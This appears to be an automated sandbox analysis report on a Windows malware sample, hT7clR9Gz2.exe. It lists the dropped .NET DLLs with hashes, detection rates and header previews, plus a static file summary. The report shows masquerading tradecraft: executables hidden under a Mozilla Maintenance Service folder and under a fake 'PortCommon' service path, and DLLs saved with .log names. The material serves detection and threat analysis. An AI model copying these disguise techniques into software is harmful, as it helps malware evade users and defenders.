                                                                    SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                    SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 17%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                    C:\Users\user\Desktop\RFZqtRqa.log

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):38400
                                                                    Entropy (8bit):5.699005826018714
                                                                    Encrypted:false
                                                                    SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                    MD5:87765D141228784AE91334BAE25AD743
                                                                    SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                    SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                    SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 4%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                    C:\Users\user\Desktop\VWqPFTQA.log

                                                                    Download File
                                                                    Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):70144
                                                                    Entropy (8bit):5.909536568846014
                                                                    Encrypted:false
                                                                    SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                    MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                    SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                    SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                    SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 12%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                    C:\Users\user\Desktop\VeZikCqF.log

                                                                    Download File
                                                                    Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):34304
                                                                    Entropy (8bit):5.618776214605176
                                                                    Encrypted:false
                                                                    SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                    MD5:9B25959D6CD6097C0EF36D2496876249
                                                                    SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                    SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                    SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                    C:\Users\user\Desktop\WSdqVQmD.log

                                                                    Download File
                                                                    Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):32256
                                                                    Entropy (8bit):5.631194486392901
                                                                    Encrypted:false
                                                                    SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                    MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                    SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                    SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                    SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 10%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                    C:\Users\user\Desktop\YQFyrQBy.log

                                                                    Download File
                                                                    Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):85504
                                                                    Entropy (8bit):5.8769270258874755
                                                                    Encrypted:false
                                                                    SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                    MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                    SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                    SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                    SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 62%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                    C:\Users\user\Desktop\ZzoyrgAK.log

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):294912
                                                                    Entropy (8bit):6.010605469502259
                                                                    Encrypted:false
                                                                    SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                    MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                    SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                    SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                    SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 12%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                                    C:\Users\user\Desktop\aSrhMzGt.log

                                                                    Download File
                                                                    Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):46592
                                                                    Entropy (8bit):5.870612048031897
                                                                    Encrypted:false
                                                                    SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                    MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                    SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                    SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                    SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 5%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                    C:\Users\user\Desktop\dqepydAD.log

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):34816
                                                                    Entropy (8bit):5.636032516496583
                                                                    Encrypted:false
                                                                    SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                    MD5:996BD447A16F0A20F238A611484AFE86
                                                                    SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                    SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                    SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 13%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                    C:\Users\user\Desktop\fFJfpvVh.log

                                                                    Download File
                                                                    Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):33792
                                                                    Entropy (8bit):5.541771649974822
                                                                    Encrypted:false
                                                                    SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                    MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                    SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                    SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                    SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 12%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                    C:\Users\user\Desktop\hgVgFZAw.log

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):50176
                                                                    Entropy (8bit):5.723168999026349
                                                                    Encrypted:false
                                                                    SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                    MD5:2E116FC64103D0F0CF47890FD571561E
                                                                    SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                    SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                    SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 17%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                    C:\Users\user\Desktop\kWLWNWBq.log

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):38912
                                                                    Entropy (8bit):5.679286635687991
                                                                    Encrypted:false
                                                                    SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                    MD5:9E910782CA3E88B3F87826609A21A54E
                                                                    SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                    SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                    SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 9%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                    C:\Users\user\Desktop\mmqNDpWU.log

                                                                    Download File
                                                                    Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):38400
                                                                    Entropy (8bit):5.699005826018714
                                                                    Encrypted:false
                                                                    SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                    MD5:87765D141228784AE91334BAE25AD743
                                                                    SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                    SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                    SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 4%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                    C:\Users\user\Desktop\qtoWZHQP.log

                                                                    Download File
                                                                    Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):41472
                                                                    Entropy (8bit):5.6808219961645605
                                                                    Encrypted:false
                                                                    SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                                    MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                                    SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                                    SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                                    SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 12%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                    C:\Users\user\Desktop\rMQELCVZ.log

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):70144
                                                                    Entropy (8bit):5.909536568846014
                                                                    Encrypted:false
                                                                    SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                    MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                    SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                    SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                    SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 12%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                    C:\Users\user\Desktop\rZIMgllI.log

                                                                    Download File
                                                                    Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):64000
                                                                    Entropy (8bit):5.857602289000348
                                                                    Encrypted:false
                                                                    SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                    MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                    SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                    SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                    SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 17%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                    C:\Users\user\Desktop\sDsEbPBc.log

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):32256
                                                                    Entropy (8bit):5.631194486392901
                                                                    Encrypted:false
                                                                    SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                    MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                    SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                    SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                    SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 10%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                    C:\Users\user\Desktop\tAUMwPQX.log

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):69632
                                                                    Entropy (8bit):5.932541123129161
                                                                    Encrypted:false
                                                                    SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                    MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                    SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                    SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                    SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 17%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                    \Device\Null

                                                                    Download File
                                                                    Process:C:\Windows\System32\PING.EXE
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):502
                                                                    Entropy (8bit):4.613055660879929
                                                                    Encrypted:false
                                                                    SSDEEP:12:Psfw5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:kydUOAokItULVDv
                                                                    MD5:B9588DDB2099F4D08809C69D95B82DF5
                                                                    SHA1:7CC70F272D791B40C9D373AD3683BB2B2F04554C
                                                                    SHA-256:85FB51B35C0C93136414542D49B7B0735B09F62D841E631F5D66F63B4B0F3308
                                                                    SHA-512:7755062BDE4E873A4DAA93584B262FA0EAF6EF3DBF0058002174480C82A1812B53A3E5C01FFD404F01D11FE6729A4841C96DAECC69A5688B9D06EDDB1A4881AF
                                                                    Malicious:false
                                                                    Preview:..Pinging 715575 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

                                                                    Static File Info

                                                                    General

                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Entropy (8bit):7.9549327993602565
                                                                    TrID:
                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:hT7clR9Gz2.exe
                                                                    File size:2'733'200 bytes
                                                                    MD5:0cadb063c76cec669e88f104493a56f1
                                                                    SHA1:929cf2e69d8afe9485d47a4a1c80cfe5a0ac9321
                                                                    SHA256:31c9aec77607a885cf75c66cd02b721bf4a866444d58bf2eaa766ef928830cb3
                                                                    SHA512:e1268ecd98442ec6b6b48d282daf9d58ad91e10daa1123af0d1a4d2580922bfc5809570c116429c227a5a4a9c49564776412729f7e3ce2154fec84339a70906f
                                                                    SSDEEP:49152:IBJIcarPNfax+qE7co8QdLbbr1yvdnSJP4v8kHIiQrAFmNHL/hBPWgG5z:yCnPVawqwnZJylyP4kRl7PWgu
                                                                    TLSH:66C523027ED290B2C83209364A367B11B93CBC651FBACED76744272DDA752E0DA31776
